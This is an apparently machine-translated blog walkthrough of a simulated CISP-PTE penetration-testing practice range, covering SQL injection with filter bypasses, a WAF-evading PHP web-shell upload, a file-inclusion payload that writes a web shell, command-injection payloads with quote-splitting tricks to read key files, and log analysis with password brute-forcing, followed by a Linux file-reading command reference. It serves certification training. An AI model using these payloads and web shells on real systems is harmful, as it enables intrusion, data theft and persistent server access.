当前位置:网站首页>Cisp-pte practice explanation (II)
Cisp-pte practice explanation (II)
2022-07-07 01:54:00 【Colorful @ star】
CISP-PTE Explanation of practical exercises ( Two )
CSIP-PTE There are five practical questions for safety certification web topic , A comprehensive problem , This article only shares 5 Avenue web topic , This range is a simulated range .
SQL Inject
Through the page prompt , We're going to use sql Inject read /tmp/360/key file , To read, you need to use load_file Command to get file information
Through the test, we know that , The value transfer method is POST Mode transfer value , You can also see the returned sql sentence .
Input id=1’) and 1#, Discover returned sql The statement filters out spaces .
Use spaces with /**/ Instead of , The value returns normally structure sql sentence , See how many display bits there are , When the display bit is 5 when , The page does not display data , So there is 4 Display bits .
id=1')/**/order/**/by/**/5#
- 1
Get the display bit through joint query , Find out union Filtered
id=-1')/**/union/**/select/**/1,2,3,4#
- 1
Try double writing union To bypass
id=-1')/**/ununionion/**/select/**/1,2,3,4#
- 1
utilize load_file To get flag value
id=-1')/**/ununionion/**/select/**/1,2,3,load_file('/tmp/360/key')#
- 1
Upload files
Know by prompt , Need to bypass waf To upload files to the server ,flag stay /key.php in .
Write a sentence first , Save a sentence in eval.php in
<?php @eval($_POST[shell])?>
- 1
adopt burp To replay, to modify , Try to bypass waf.
Change the file suffix to pht, Change the file type to image/gif Add header GIF89a, Click Send You can see the upload is successful , Use Chinese ant sword to connect .
see key.php file
File contains
adopt url You can tell it is GET Pass value , You can write a sentence using a pseudo protocol <?php $a = fopen('./1.php','w'); fwrite($a,'<?php eval($_POST[shell])?>'); fclose($a); ?>
Successful connection
obtain flag
Command execution
Enter... In the input box ’$,$$,|,||,;' See what's filtered
Found no filter , I like to use ‘;’, So the following is through ‘;’ To test .
Input ;find / -name "key.php"
find key.php The path of , Then just go through cat Go and see key.php Content is enough
;cat /app/key.php
- 1
cat The filtered , Then view the file in another way
;grep '' /app/key.php
- 1
A word came out , But it doesn't fully show
F12 Look at the code , obtain flag
Log analysis
By prompting , We should focus on IP by 172.16.12.12 The operation of , Download the log file , make a concrete analysis .
First, select the IP,ctrl+f Open search , Input IP, Click to find... In the current file
You will get the following search results , Filter it again , Only search with a return value of 200 The data of .
Right click to find data in this search result
Search for keywords :200
You can see that there is a suspected background manager url
Open it in the browser
Try blasting with blasting , password
Find the account number :admin password :password123 The page status code is 302, Jump may occur
Try signing in , obtain flag
</article>
Command injection related knowledge explanation
Personally, I think this command injection is the simplest .
Before that, let's learn what commands can be used to read files .
linux There are mainly seven kinds of instructions commonly used to read the contents of files :
cat、tac、nl、more、less、head、tail
cat: Start with the first line , And output all the content
cat file name Display the contents of the file on the screen
cat -n file name Display the contents of the file on the screen , And display the line number
cat -b file name Display the contents of the file on the screen , And display the line number , But the blank line number is not displayed
tac: Show the contents in reverse order from the last line , And output all the content
tac file name Display the contents of the file on the screen , But it starts from the last line and goes forward
tac -s separator file name – from separator Output backward , The output in reverse order does not contain separator, Output to the last line, and then in order separator Previous content output
tac -b -s separator file name – from separator Output backward , The output in reverse order contains separator, Output to the last line, and then in order separator Previous content output
nl: Be similar to cat-n, Output line number when displaying
nl file name ( Namely nl -b t file name ) Use nl The instruction must show the line number , It is mainly about how to display the operation line number
nl -b a file name According to the line Numbers , Blank lines also display line numbers
nl -b t file name According to the line Numbers , Blank lines do not show line numbers ( The default value is )
nl -w Numbers x file name The number of digits occupied by the line number field
nl -n ln file name The line number is displayed at the leftmost end of the space in the front of the field
nl -n rn file name The line number is displayed at the right end of the space in the front of the field , And no more 0
nl -n rz file name The line number is displayed at the right end of the space in the front of the field , And add 0
more: Depending on the window size , Check the contents of the file page by page
more file name
less: and more similar , But its advantage can turn the page forward , And it can search for characters
less file name
head: Show only the first few lines
haed file name – Display the first ten lines of the file
tail: Show only the last few lines
tail file name – Show end of file
The range where relevant orders are executed
Range one :
Direct structure payload:
127.0.0.1 | tac …/key.php
After testing , following payload Can complete this problem .
127.0.0.1 | less …/key.php
127.0.0.1 | m’or’e …/key.php
127.0.0.1 | tail …/key.php
127.0.0.1 | v’'i …/key.php
127.0.0.1 | c’a’t …/key.php
127.0.0.1 | head …/key.php
127.0.0.1 | nl …/key.php
|od -c …/key.php
|xxd …/key.php
|xxd …/key.php|grep key
|grep “key” …/key.php
|sed -n ‘1,5p’ …/key.php|grep key
Range II :
Just use the one just now payload try :
127.0.0.1 | m’or’e …/key.php
After testing, this range can be used payload:
127.0.0.1 | v’'i …/key.php
127.0.0.1 | c’a’t …/key.php
127.0.0.1 |xxd …/key.php
127.0.0.1 |grep “key” …/key.php
边栏推荐
- Instructions for using the domain analysis tool bloodhound
- 鼠标右键 自定义
- Mysqlbackup restores specific tables
- IDEA常用的快捷键
- Appium automation test foundation uiautomatorviewer positioning tool
- JS ES5也可以创建常量?
- 猫猫回收站
- Batch delete data in SQL - set in entity
- Analyze "C language" [advanced] paid knowledge [End]
- C language instance_ two
猜你喜欢
ROS学习(23)action通信机制
刨析《C语言》【进阶】付费知识【完结】
AcWing 1148. 秘密的牛奶运输 题解(最小生成树)
AcWing 345. Cattle station solution (nature and multiplication of Floyd)
Appium基础 — Appium Inspector定位工具(一)
Instructions for using the domain analysis tool bloodhound
场景实践:基于函数计算快速搭建Wordpress博客系统
dvajs的基础介绍及使用
微服务架构介绍
ROS learning (26) dynamic parameter configuration
随机推荐
MySQL最基本的SELECT(查询)语句
WCF基金会
The difference between Tansig and logsig. Why does BP like to use Tansig
Mongodb checks whether the table is imported successfully
百度飞将BMN时序动作定位框架 | 数据准备与训练指南 (上)
AcWing 1148. 秘密的牛奶运输 题解(最小生成树)
swiper组件中使用video导致全屏错位
POJ 3177 Redundant Paths POJ 3352 Road Construction(双连接)
Amway wave C2 tools
The cradle of eternity
js如何快速创建一个长度为 n 的数组
JS es5 peut également créer des constantes?
刨析《C语言》【进阶】付费知识【一】
Right mouse button customization
Box stretch and pull (left-right mode)
ROS学习(十九)机器人SLAM功能包——cartographer
CISP-PTE实操练习讲解(二)
AcWing 345. Cattle station solution (nature and multiplication of Floyd)
Basic introduction and use of dvajs
AcWing 346. 走廊泼水节 题解(推公式、最小生成树)